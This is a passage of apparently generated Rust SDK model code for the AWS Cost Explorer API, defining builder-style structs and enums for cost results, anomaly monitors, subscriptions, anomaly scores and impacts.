self.total = input;
self
}
pub fn groups(mut self, input: impl Into<crate::model::Group>) -> Self {
let mut v = self.groups.unwrap_or_default();
v.push(input.into());
self.groups = Some(v);
self
}
pub fn set_groups(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Group>>,
) -> Self {
self.groups = input;
self
}
/// <p>Determines whether the result is estimated.</p>
pub fn estimated(mut self, input: bool) -> Self {
self.estimated = Some(input);
self
}
pub fn set_estimated(mut self, input: std::option::Option<bool>) -> Self {
self.estimated = input;
self
}
/// Consumes the builder and constructs a [`ResultByTime`](crate::model::ResultByTime)
pub fn build(self) -> crate::model::ResultByTime {
crate::model::ResultByTime {
time_period: self.time_period,
total: self.total,
groups: self.groups,
estimated: self.estimated.unwrap_or_default(),
}
}
}
}
impl ResultByTime {
/// Creates a new builder-style object to manufacture [`ResultByTime`](crate::model::ResultByTime)
pub fn builder() -> crate::model::result_by_time::Builder {
crate::model::result_by_time::Builder::default()
}
}
/// <p>One level of grouped data in the results.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Group {
/// <p>The keys that are included in this group.</p>
pub keys: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The metrics that are included in this group.</p>
pub metrics: std::option::Option<
std::collections::HashMap<std::string::String, crate::model::MetricValue>,
>,
}
impl std::fmt::Debug for Group {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Group");
formatter.field("keys", &self.keys);
formatter.field("metrics", &self.metrics);
formatter.finish()
}
}
/// See [`Group`](crate::model::Group)
pub mod group {
/// A builder for [`Group`](crate::model::Group)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) keys: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) metrics: std::option::Option<
std::collections::HashMap<std::string::String, crate::model::MetricValue>,
>,
}
impl Builder {
pub fn keys(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.keys.unwrap_or_default();
v.push(input.into());
self.keys = Some(v);
self
}
pub fn set_keys(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.keys = input;
self
}
pub fn metrics(
mut self,
k: impl Into<std::string::String>,
v: impl Into<crate::model::MetricValue>,
) -> Self {
let mut hash_map = self.metrics.unwrap_or_default();
hash_map.insert(k.into(), v.into());
self.metrics = Some(hash_map);
self
}
pub fn set_metrics(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, crate::model::MetricValue>,
>,
) -> Self {
self.metrics = input;
self
}
/// Consumes the builder and constructs a [`Group`](crate::model::Group)
pub fn build(self) -> crate::model::Group {
crate::model::Group {
keys: self.keys,
metrics: self.metrics,
}
}
}
}
impl Group {
/// Creates a new builder-style object to manufacture [`Group`](crate::model::Group)
pub fn builder() -> crate::model::group::Builder {
crate::model::group::Builder::default()
}
}
/// <p>The association between a monitor, threshold, and list of subscribers used to deliver
/// notifications about anomalies detected by a monitor that exceeds a threshold. The
/// content consists of the detailed metadata and the current status of the
/// <code>AnomalySubscription</code> object. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct AnomalySubscription {
/// <p>The <code>AnomalySubscription</code> Amazon Resource Name (ARN). </p>
pub subscription_arn: std::option::Option<std::string::String>,
/// <p>Your unique account identifier. </p>
pub account_id: std::option::Option<std::string::String>,
/// <p>A list of cost anomaly monitors. </p>
pub monitor_arn_list: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>A list of subscribers to notify. </p>
pub subscribers: std::option::Option<std::vec::Vec<crate::model::Subscriber>>,
/// <p>The dollar value that triggers a notification if the threshold is exceeded. </p>
pub threshold: std::option::Option<f64>,
/// <p>The frequency that anomaly reports are sent over email. </p>
pub frequency: std::option::Option<crate::model::AnomalySubscriptionFrequency>,
/// <p>The name for the subscription. </p>
pub subscription_name: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for AnomalySubscription {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("AnomalySubscription");
formatter.field("subscription_arn", &self.subscription_arn);
formatter.field("account_id", &self.account_id);
formatter.field("monitor_arn_list", &self.monitor_arn_list);
formatter.field("subscribers", &self.subscribers);
formatter.field("threshold", &self.threshold);
formatter.field("frequency", &self.frequency);
formatter.field("subscription_name", &self.subscription_name);
formatter.finish()
}
}
/// See [`AnomalySubscription`](crate::model::AnomalySubscription)
pub mod anomaly_subscription {
/// A builder for [`AnomalySubscription`](crate::model::AnomalySubscription)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) subscription_arn: std::option::Option<std::string::String>,
pub(crate) account_id: std::option::Option<std::string::String>,
pub(crate) monitor_arn_list: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) subscribers: std::option::Option<std::vec::Vec<crate::model::Subscriber>>,
pub(crate) threshold: std::option::Option<f64>,
pub(crate) frequency: std::option::Option<crate::model::AnomalySubscriptionFrequency>,
pub(crate) subscription_name: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The <code>AnomalySubscription</code> Amazon Resource Name (ARN). </p>
pub fn subscription_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.subscription_arn = Some(input.into());
self
}
pub fn set_subscription_arn(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.subscription_arn = input;
self
}
/// <p>Your unique account identifier. </p>
pub fn account_id(mut self, input: impl Into<std::string::String>) -> Self {
self.account_id = Some(input.into());
self
}
pub fn set_account_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.account_id = input;
self
}
pub fn monitor_arn_list(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.monitor_arn_list.unwrap_or_default();
v.push(input.into());
self.monitor_arn_list = Some(v);
self
}
pub fn set_monitor_arn_list(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.monitor_arn_list = input;
self
}
pub fn subscribers(mut self, input: impl Into<crate::model::Subscriber>) -> Self {
let mut v = self.subscribers.unwrap_or_default();
v.push(input.into());
self.subscribers = Some(v);
self
}
pub fn set_subscribers(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Subscriber>>,
) -> Self {
self.subscribers = input;
self
}
/// <p>The dollar value that triggers a notification if the threshold is exceeded. </p>
pub fn threshold(mut self, input: f64) -> Self {
self.threshold = Some(input);
self
}
pub fn set_threshold(mut self, input: std::option::Option<f64>) -> Self {
self.threshold = input;
self
}
/// <p>The frequency that anomaly reports are sent over email. </p>
pub fn frequency(mut self, input: crate::model::AnomalySubscriptionFrequency) -> Self {
self.frequency = Some(input);
self
}
pub fn set_frequency(
mut self,
input: std::option::Option<crate::model::AnomalySubscriptionFrequency>,
) -> Self {
self.frequency = input;
self
}
/// <p>The name for the subscription. </p>
pub fn subscription_name(mut self, input: impl Into<std::string::String>) -> Self {
self.subscription_name = Some(input.into());
self
}
pub fn set_subscription_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.subscription_name = input;
self
}
/// Consumes the builder and constructs a [`AnomalySubscription`](crate::model::AnomalySubscription)
pub fn build(self) -> crate::model::AnomalySubscription {
crate::model::AnomalySubscription {
subscription_arn: self.subscription_arn,
account_id: self.account_id,
monitor_arn_list: self.monitor_arn_list,
subscribers: self.subscribers,
threshold: self.threshold,
frequency: self.frequency,
subscription_name: self.subscription_name,
}
}
}
}
impl AnomalySubscription {
/// Creates a new builder-style object to manufacture [`AnomalySubscription`](crate::model::AnomalySubscription)
pub fn builder() -> crate::model::anomaly_subscription::Builder {
crate::model::anomaly_subscription::Builder::default()
}
}
/// <p>This object continuously inspects your account's cost data for anomalies. It's based
/// on <code>MonitorType</code> and <code>MonitorSpecification</code>. The content consists
/// of detailed metadata and the current status of the monitor object. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct AnomalyMonitor {
/// <p>The Amazon Resource Name (ARN) value. </p>
pub monitor_arn: std::option::Option<std::string::String>,
/// <p>The name of the monitor. </p>
pub monitor_name: std::option::Option<std::string::String>,
/// <p>The date when the monitor was created. </p>
pub creation_date: std::option::Option<std::string::String>,
/// <p>The date when the monitor was last updated. </p>
pub last_updated_date: std::option::Option<std::string::String>,
/// <p>The date when the monitor last evaluated for anomalies. </p>
pub last_evaluated_date: std::option::Option<std::string::String>,
/// <p>The possible type values. </p>
pub monitor_type: std::option::Option<crate::model::MonitorType>,
/// <p>The dimensions to evaluate. </p>
pub monitor_dimension: std::option::Option<crate::model::MonitorDimension>,
/// <p>Use <code>Expression</code> to filter by cost or by usage. There are two patterns: </p>
/// <ul>
/// <li>
/// <p>Simple dimension values - You can set the dimension name and values for the
/// filters that you plan to use. For example, you can filter for
/// <code>REGION==us-east-1 OR REGION==us-west-1</code>. For
/// <code>GetRightsizingRecommendation</code>, the Region is a full name (for
/// example, <code>REGION==US East (N. Virginia)</code>. The <code>Expression</code>
/// example is as follows:</p>
/// <p>
/// <code>{ "Dimensions": { "Key": "REGION", "Values": [ "us-east-1", “us-west-1” ]
/// } }</code>
/// </p>
/// <p>The list of dimension values are OR'd together to retrieve cost or usage data.
/// You can create <code>Expression</code> and <code>DimensionValues</code> objects
/// using either <code>with*</code> methods or <code>set*</code> methods in multiple
/// lines. </p>
/// </li>
/// <li>
/// <p>Compound dimension values with logical operations - You can use multiple
/// <code>Expression</code> types and the logical operators
/// <code>AND/OR/NOT</code> to create a list of one or more
/// <code>Expression</code> objects. By doing this, you can filter on more
/// advanced options. For example, you can filter on <code>((REGION == us-east-1 OR
/// REGION == us-west-1) OR (TAG.Type == Type1)) AND (USAGE_TYPE !=
/// DataTransfer)</code>. The <code>Expression</code> for that is as
/// follows:</p>
/// <p>
/// <code>{ "And": [ {"Or": [ {"Dimensions": { "Key": "REGION", "Values": [
/// "us-east-1", "us-west-1" ] }}, {"Tags": { "Key": "TagName", "Values":
/// ["Value1"] } } ]}, {"Not": {"Dimensions": { "Key": "USAGE_TYPE", "Values":
/// ["DataTransfer"] }}} ] } </code>
/// </p>
/// <note>
/// <p>Because each <code>Expression</code> can have only one operator, the
/// service returns an error if more than one is specified. The following
/// example shows an <code>Expression</code> object that creates an
/// error.</p>
/// </note>
/// <p>
/// <code> { "And": [ ... ], "DimensionValues": { "Dimension": "USAGE_TYPE",
/// "Values": [ "DataTransfer" ] } } </code>
/// </p>
/// </li>
/// </ul>
/// <note>
/// <p>For the <code>GetRightsizingRecommendation</code> action, a combination of OR and
/// NOT isn't supported. OR isn't supported between different dimensions, or dimensions
/// and tags. NOT operators aren't supported. Dimensions are also limited to
/// <code>LINKED_ACCOUNT</code>, <code>REGION</code>, or
/// <code>RIGHTSIZING_TYPE</code>.</p>
/// <p>For the <code>GetReservationPurchaseRecommendation</code> action, only NOT is
/// supported. AND and OR aren't supported. Dimensions are limited to
/// <code>LINKED_ACCOUNT</code>.</p>
/// </note>
pub monitor_specification: std::option::Option<crate::model::Expression>,
/// <p>The value for evaluated dimensions. </p>
pub dimensional_value_count: i32,
}
impl std::fmt::Debug for AnomalyMonitor {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("AnomalyMonitor");
formatter.field("monitor_arn", &self.monitor_arn);
formatter.field("monitor_name", &self.monitor_name);
formatter.field("creation_date", &self.creation_date);
formatter.field("last_updated_date", &self.last_updated_date);
formatter.field("last_evaluated_date", &self.last_evaluated_date);
formatter.field("monitor_type", &self.monitor_type);
formatter.field("monitor_dimension", &self.monitor_dimension);
formatter.field("monitor_specification", &self.monitor_specification);
formatter.field("dimensional_value_count", &self.dimensional_value_count);
formatter.finish()
}
}
/// See [`AnomalyMonitor`](crate::model::AnomalyMonitor)
pub mod anomaly_monitor {
/// A builder for [`AnomalyMonitor`](crate::model::AnomalyMonitor)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) monitor_arn: std::option::Option<std::string::String>,
pub(crate) monitor_name: std::option::Option<std::string::String>,
pub(crate) creation_date: std::option::Option<std::string::String>,
pub(crate) last_updated_date: std::option::Option<std::string::String>,
pub(crate) last_evaluated_date: std::option::Option<std::string::String>,
pub(crate) monitor_type: std::option::Option<crate::model::MonitorType>,
pub(crate) monitor_dimension: std::option::Option<crate::model::MonitorDimension>,
pub(crate) monitor_specification: std::option::Option<crate::model::Expression>,
pub(crate) dimensional_value_count: std::option::Option<i32>,
}
impl Builder {
/// <p>The Amazon Resource Name (ARN) value. </p>
pub fn monitor_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.monitor_arn = Some(input.into());
self
}
pub fn set_monitor_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.monitor_arn = input;
self
}
/// <p>The name of the monitor. </p>
pub fn monitor_name(mut self, input: impl Into<std::string::String>) -> Self {
self.monitor_name = Some(input.into());
self
}
pub fn set_monitor_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.monitor_name = input;
self
}
/// <p>The date when the monitor was created. </p>
pub fn creation_date(mut self, input: impl Into<std::string::String>) -> Self {
self.creation_date = Some(input.into());
self
}
pub fn set_creation_date(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.creation_date = input;
self
}
/// <p>The date when the monitor was last updated. </p>
pub fn last_updated_date(mut self, input: impl Into<std::string::String>) -> Self {
self.last_updated_date = Some(input.into());
self
}
pub fn set_last_updated_date(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.last_updated_date = input;
self
}
/// <p>The date when the monitor last evaluated for anomalies. </p>
pub fn last_evaluated_date(mut self, input: impl Into<std::string::String>) -> Self {
self.last_evaluated_date = Some(input.into());
self
}
pub fn set_last_evaluated_date(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.last_evaluated_date = input;
self
}
/// <p>The possible type values. </p>
pub fn monitor_type(mut self, input: crate::model::MonitorType) -> Self {
self.monitor_type = Some(input);
self
}
pub fn set_monitor_type(
mut self,
input: std::option::Option<crate::model::MonitorType>,
) -> Self {
self.monitor_type = input;
self
}
/// <p>The dimensions to evaluate. </p>
pub fn monitor_dimension(mut self, input: crate::model::MonitorDimension) -> Self {
self.monitor_dimension = Some(input);
self
}
pub fn set_monitor_dimension(
mut self,
input: std::option::Option<crate::model::MonitorDimension>,
) -> Self {
self.monitor_dimension = input;
self
}
/// <p>Use <code>Expression</code> to filter by cost or by usage. There are two patterns: </p>
/// <ul>
/// <li>
/// <p>Simple dimension values - You can set the dimension name and values for the
/// filters that you plan to use. For example, you can filter for
/// <code>REGION==us-east-1 OR REGION==us-west-1</code>. For
/// <code>GetRightsizingRecommendation</code>, the Region is a full name (for
/// example, <code>REGION==US East (N. Virginia)</code>. The <code>Expression</code>
/// example is as follows:</p>
/// <p>
/// <code>{ "Dimensions": { "Key": "REGION", "Values": [ "us-east-1", “us-west-1” ]
/// } }</code>
/// </p>
/// <p>The list of dimension values are OR'd together to retrieve cost or usage data.
/// You can create <code>Expression</code> and <code>DimensionValues</code> objects
/// using either <code>with*</code> methods or <code>set*</code> methods in multiple
/// lines. </p>
/// </li>
/// <li>
/// <p>Compound dimension values with logical operations - You can use multiple
/// <code>Expression</code> types and the logical operators
/// <code>AND/OR/NOT</code> to create a list of one or more
/// <code>Expression</code> objects. By doing this, you can filter on more
/// advanced options. For example, you can filter on <code>((REGION == us-east-1 OR
/// REGION == us-west-1) OR (TAG.Type == Type1)) AND (USAGE_TYPE !=
/// DataTransfer)</code>. The <code>Expression</code> for that is as
/// follows:</p>
/// <p>
/// <code>{ "And": [ {"Or": [ {"Dimensions": { "Key": "REGION", "Values": [
/// "us-east-1", "us-west-1" ] }}, {"Tags": { "Key": "TagName", "Values":
/// ["Value1"] } } ]}, {"Not": {"Dimensions": { "Key": "USAGE_TYPE", "Values":
/// ["DataTransfer"] }}} ] } </code>
/// </p>
/// <note>
/// <p>Because each <code>Expression</code> can have only one operator, the
/// service returns an error if more than one is specified. The following
/// example shows an <code>Expression</code> object that creates an
/// error.</p>
/// </note>
/// <p>
/// <code> { "And": [ ... ], "DimensionValues": { "Dimension": "USAGE_TYPE",
/// "Values": [ "DataTransfer" ] } } </code>
/// </p>
/// </li>
/// </ul>
/// <note>
/// <p>For the <code>GetRightsizingRecommendation</code> action, a combination of OR and
/// NOT isn't supported. OR isn't supported between different dimensions, or dimensions
/// and tags. NOT operators aren't supported. Dimensions are also limited to
/// <code>LINKED_ACCOUNT</code>, <code>REGION</code>, or
/// <code>RIGHTSIZING_TYPE</code>.</p>
/// <p>For the <code>GetReservationPurchaseRecommendation</code> action, only NOT is
/// supported. AND and OR aren't supported. Dimensions are limited to
/// <code>LINKED_ACCOUNT</code>.</p>
/// </note>
pub fn monitor_specification(mut self, input: crate::model::Expression) -> Self {
self.monitor_specification = Some(input);
self
}
pub fn set_monitor_specification(
mut self,
input: std::option::Option<crate::model::Expression>,
) -> Self {
self.monitor_specification = input;
self
}
/// <p>The value for evaluated dimensions. </p>
pub fn dimensional_value_count(mut self, input: i32) -> Self {
self.dimensional_value_count = Some(input);
self
}
pub fn set_dimensional_value_count(mut self, input: std::option::Option<i32>) -> Self {
self.dimensional_value_count = input;
self
}
/// Consumes the builder and constructs a [`AnomalyMonitor`](crate::model::AnomalyMonitor)
pub fn build(self) -> crate::model::AnomalyMonitor {
crate::model::AnomalyMonitor {
monitor_arn: self.monitor_arn,
monitor_name: self.monitor_name,
creation_date: self.creation_date,
last_updated_date: self.last_updated_date,
last_evaluated_date: self.last_evaluated_date,
monitor_type: self.monitor_type,
monitor_dimension: self.monitor_dimension,
monitor_specification: self.monitor_specification,
dimensional_value_count: self.dimensional_value_count.unwrap_or_default(),
}
}
}
}
impl AnomalyMonitor {
/// Creates a new builder-style object to manufacture [`AnomalyMonitor`](crate::model::AnomalyMonitor)
pub fn builder() -> crate::model::anomaly_monitor::Builder {
crate::model::anomaly_monitor::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum MonitorDimension {
Service,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for MonitorDimension {
fn from(s: &str) -> Self {
match s {
"SERVICE" => MonitorDimension::Service,
other => MonitorDimension::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for MonitorDimension {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(MonitorDimension::from(s))
}
}
impl MonitorDimension {
pub fn as_str(&self) -> &str {
match self {
MonitorDimension::Service => "SERVICE",
MonitorDimension::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["SERVICE"]
}
}
impl AsRef<str> for MonitorDimension {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum MonitorType {
Custom,
Dimensional,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for MonitorType {
fn from(s: &str) -> Self {
match s {
"CUSTOM" => MonitorType::Custom,
"DIMENSIONAL" => MonitorType::Dimensional,
other => MonitorType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for MonitorType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(MonitorType::from(s))
}
}
impl MonitorType {
pub fn as_str(&self) -> &str {
match self {
MonitorType::Custom => "CUSTOM",
MonitorType::Dimensional => "DIMENSIONAL",
MonitorType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["CUSTOM", "DIMENSIONAL"]
}
}
impl AsRef<str> for MonitorType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>An unusual cost pattern. This consists of the detailed metadata and the current status
/// of the anomaly object. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Anomaly {
/// <p>The unique identifier for the anomaly. </p>
pub anomaly_id: std::option::Option<std::string::String>,
/// <p>The first day the anomaly is detected. </p>
pub anomaly_start_date: std::option::Option<std::string::String>,
/// <p>The last day the anomaly is detected. </p>
pub anomaly_end_date: std::option::Option<std::string::String>,
/// <p>The dimension for the anomaly (for example, an Amazon Web Services service in a service
/// monitor). </p>
pub dimension_value: std::option::Option<std::string::String>,
/// <p>The list of identified root causes for the anomaly. </p>
pub root_causes: std::option::Option<std::vec::Vec<crate::model::RootCause>>,
/// <p>The latest and maximum score for the anomaly. </p>
pub anomaly_score: std::option::Option<crate::model::AnomalyScore>,
/// <p>The dollar impact for the anomaly. </p>
pub impact: std::option::Option<crate::model::Impact>,
/// <p>The Amazon Resource Name (ARN) for the cost monitor that generated this anomaly.
/// </p>
pub monitor_arn: std::option::Option<std::string::String>,
/// <p>The feedback value. </p>
pub feedback: std::option::Option<crate::model::AnomalyFeedbackType>,
}
impl std::fmt::Debug for Anomaly {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Anomaly");
formatter.field("anomaly_id", &self.anomaly_id);
formatter.field("anomaly_start_date", &self.anomaly_start_date);
formatter.field("anomaly_end_date", &self.anomaly_end_date);
formatter.field("dimension_value", &self.dimension_value);
formatter.field("root_causes", &self.root_causes);
formatter.field("anomaly_score", &self.anomaly_score);
formatter.field("impact", &self.impact);
formatter.field("monitor_arn", &self.monitor_arn);
formatter.field("feedback", &self.feedback);
formatter.finish()
}
}
/// See [`Anomaly`](crate::model::Anomaly)
pub mod anomaly {
/// A builder for [`Anomaly`](crate::model::Anomaly)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) anomaly_id: std::option::Option<std::string::String>,
pub(crate) anomaly_start_date: std::option::Option<std::string::String>,
pub(crate) anomaly_end_date: std::option::Option<std::string::String>,
pub(crate) dimension_value: std::option::Option<std::string::String>,
pub(crate) root_causes: std::option::Option<std::vec::Vec<crate::model::RootCause>>,
pub(crate) anomaly_score: std::option::Option<crate::model::AnomalyScore>,
pub(crate) impact: std::option::Option<crate::model::Impact>,
pub(crate) monitor_arn: std::option::Option<std::string::String>,
pub(crate) feedback: std::option::Option<crate::model::AnomalyFeedbackType>,
}
impl Builder {
/// <p>The unique identifier for the anomaly. </p>
pub fn anomaly_id(mut self, input: impl Into<std::string::String>) -> Self {
self.anomaly_id = Some(input.into());
self
}
pub fn set_anomaly_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.anomaly_id = input;
self
}
/// <p>The first day the anomaly is detected. </p>
pub fn anomaly_start_date(mut self, input: impl Into<std::string::String>) -> Self {
self.anomaly_start_date = Some(input.into());
self
}
pub fn set_anomaly_start_date(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.anomaly_start_date = input;
self
}
/// <p>The last day the anomaly is detected. </p>
pub fn anomaly_end_date(mut self, input: impl Into<std::string::String>) -> Self {
self.anomaly_end_date = Some(input.into());
self
}
pub fn set_anomaly_end_date(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.anomaly_end_date = input;
self
}
/// <p>The dimension for the anomaly (for example, an Amazon Web Services service in a service
/// monitor). </p>
pub fn dimension_value(mut self, input: impl Into<std::string::String>) -> Self {
self.dimension_value = Some(input.into());
self
}
pub fn set_dimension_value(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dimension_value = input;
self
}
pub fn root_causes(mut self, input: impl Into<crate::model::RootCause>) -> Self {
let mut v = self.root_causes.unwrap_or_default();
v.push(input.into());
self.root_causes = Some(v);
self
}
pub fn set_root_causes(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::RootCause>>,
) -> Self {
self.root_causes = input;
self
}
/// <p>The latest and maximum score for the anomaly. </p>
pub fn anomaly_score(mut self, input: crate::model::AnomalyScore) -> Self {
self.anomaly_score = Some(input);
self
}
pub fn set_anomaly_score(
mut self,
input: std::option::Option<crate::model::AnomalyScore>,
) -> Self {
self.anomaly_score = input;
self
}
/// <p>The dollar impact for the anomaly. </p>
pub fn impact(mut self, input: crate::model::Impact) -> Self {
self.impact = Some(input);
self
}
pub fn set_impact(mut self, input: std::option::Option<crate::model::Impact>) -> Self {
self.impact = input;
self
}
/// <p>The Amazon Resource Name (ARN) for the cost monitor that generated this anomaly.
/// </p>
pub fn monitor_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.monitor_arn = Some(input.into());
self
}
pub fn set_monitor_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.monitor_arn = input;
self
}
/// <p>The feedback value. </p>
pub fn feedback(mut self, input: crate::model::AnomalyFeedbackType) -> Self {
self.feedback = Some(input);
self
}
pub fn set_feedback(
mut self,
input: std::option::Option<crate::model::AnomalyFeedbackType>,
) -> Self {
self.feedback = input;
self
}
/// Consumes the builder and constructs a [`Anomaly`](crate::model::Anomaly)
pub fn build(self) -> crate::model::Anomaly {
crate::model::Anomaly {
anomaly_id: self.anomaly_id,
anomaly_start_date: self.anomaly_start_date,
anomaly_end_date: self.anomaly_end_date,
dimension_value: self.dimension_value,
root_causes: self.root_causes,
anomaly_score: self.anomaly_score,
impact: self.impact,
monitor_arn: self.monitor_arn,
feedback: self.feedback,
}
}
}
}
impl Anomaly {
/// Creates a new builder-style object to manufacture [`Anomaly`](crate::model::Anomaly)
pub fn builder() -> crate::model::anomaly::Builder {
crate::model::anomaly::Builder::default()
}
}
/// <p>The dollar value of the anomaly. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Impact {
/// <p>The maximum dollar value that's observed for an anomaly. </p>
pub max_impact: f64,
/// <p>The cumulative dollar value that's observed for an anomaly. </p>
pub total_impact: f64,
}
impl std::fmt::Debug for Impact {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Impact");
formatter.field("max_impact", &self.max_impact);
formatter.field("total_impact", &self.total_impact);
formatter.finish()
}
}
/// See [`Impact`](crate::model::Impact)
pub mod impact {
/// A builder for [`Impact`](crate::model::Impact)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) max_impact: std::option::Option<f64>,
pub(crate) total_impact: std::option::Option<f64>,
}
impl Builder {
/// <p>The maximum dollar value that's observed for an anomaly. </p>
pub fn max_impact(mut self, input: f64) -> Self {
self.max_impact = Some(input);
self
}
pub fn set_max_impact(mut self, input: std::option::Option<f64>) -> Self {
self.max_impact = input;
self
}
/// <p>The cumulative dollar value that's observed for an anomaly. </p>
pub fn total_impact(mut self, input: f64) -> Self {
self.total_impact = Some(input);
self
}
pub fn set_total_impact(mut self, input: std::option::Option<f64>) -> Self {
self.total_impact = input;
self
}
/// Consumes the builder and constructs a [`Impact`](crate::model::Impact)
pub fn build(self) -> crate::model::Impact {
crate::model::Impact {
max_impact: self.max_impact.unwrap_or_default(),
total_impact: self.total_impact.unwrap_or_default(),
}
}
}
}
impl Impact {
/// Creates a new builder-style object to manufacture [`Impact`](crate::model::Impact)
pub fn builder() -> crate::model::impact::Builder {
crate::model::impact::Builder::default()
}
}
/// <p>Quantifies the anomaly. The higher score means that it's more anomalous. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct AnomalyScore {
/// <p>The maximum score that's observed during the <code>AnomalyDateInterval</code>. </p>
pub max_score: f64,
/// <p>The last observed score. </p>
pub current_score: f64,
}
impl std::fmt::Debug for AnomalyScore {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("AnomalyScore");
formatter.field("max_score", &self.max_score);
formatter.field("current_score", &self.current_score);
formatter.finish()
}
}
/// See [`AnomalyScore`](crate::model::AnomalyScore)
pub mod anomaly_score {
/// A builder for [`AnomalyScore`](crate::model::AnomalyScore)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) max_score: std::option::Option<f64>,
pub(crate) current_score: std::option::Option<f64>,
}
impl Builder {
/// <p>The maximum score that's observed during the <code>AnomalyDateInterval</code>. </p>
pub fn max_score(mut self, input: f64) -> Self {
self.max_score = Some(input);
self
}
pub fn set_max_score(mut self, input: std::option::Option<f64>) -> Self {
self.max_score = input;
self
}
/// <p>The last observed score. </p>
pub fn current_score(mut self, input: f64) -> Self {
self.current_score = Some(input);
self
}
pub fn set_current_score(mut self, input: std::option::Option<f64>) -> Self {
self.current_score = input;
self
}
/// Consumes the builder and constructs a [`AnomalyScore`](crate::model::AnomalyScore)
pub fn build(self) -> crate::model::AnomalyScore {
crate::model::AnomalyScore {
max_score: self.max_score.unwrap_or_default(),
current_score: self.current_score.unwrap_or_default(),
}
}
}
}
impl AnomalyScore {
/// Creates a new builder-style object to manufacture [`AnomalyScore`](crate::model::AnomalyScore)
pub fn builder() -> crate::model::anomaly_score::Builder {
crate::model::anomaly_score::Builder::default()
}
}
/// <p>The combination of Amazon Web Services service, linked account, Region, and usage type
/// where a cost anomaly is observed. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RootCause {
/// <p>The Amazon Web Services service name that's associated with the cost anomaly. </p>
pub service: std::option::Option<std::string::String>,
